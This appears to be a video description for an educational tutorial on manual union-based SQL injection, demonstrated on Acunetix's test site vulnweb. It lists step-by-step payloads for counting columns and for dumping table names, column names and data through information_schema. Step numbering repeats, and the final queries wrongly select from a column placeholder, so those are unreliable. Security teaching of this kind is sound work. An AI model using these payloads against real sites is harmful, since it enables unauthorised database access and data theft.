Exploiting SQL Injection Vulnerability Manually

***THIS VIDEO IS ONLY FOR EDUCATION PURPOSE *** This video teaches you about manual sql injection exploitation . SQL Injection Vulnerability Ranked A03 Category in OWASP Top Ten . These vulnerabilities lead to data breach and more . """ SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. """ Source : Wikipedia Source Link : https://en.wikipedia.org/wiki/SQL_injection I made this video by testing the sql injection queries on vulnweb website which is owned by *acunetix*. Vulnweb Link : http://testphp.vulnweb.com/ Step : 1 Find A Parameter In The Target Website Step : 2 Inject single quote or double quote in the end of the parameter . If you get a error in the target website , there are chances where the website has a sql injection vulnerability . Step : 3 We need to find the number of column in the site , to do that , we will use a special query "order by {num}" Step : 4 Find the range of the column by typing numbers like 5 , 10 , 15 , 20 One by one . Step : 5 If you managed to find the number of column , you need to find the number of vulnerable columns among those number . You should try another query for finding vulnerable columns. "union select {number of columns separated with comma} --" Step : 6 If you manage to find the vulnerable column numbers , you can inject the malicious query by replacing the vulnerable column number(from the link) with the malicious query . Step : 6 To get the tables name , the following query should be typed . "union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--" Step : 7 To get the columns name from a specific table , the following query should be typed . "union select 1,2,3,4,5,6,column_name,8,9,10,11 from information_schema.columns where table_name='{table_name}' --" The {table_name} should be replaced with the suitable table name you want. Step : 8 To get the Multiple Data from a specific column , the following query should be typed . "union select 1,2,3,4,5,6,group_concat({file1},{file2},{file3}),8,9,10,11 from {column_name} --" To get Single Data from a specific column , the following query should be typed. "union select 1,2,3,4,5,6,{data},8,9,10,11 from {column_name} --" Hope you have learn something new :) If you want to talk , here is my social media username Discord - data#0166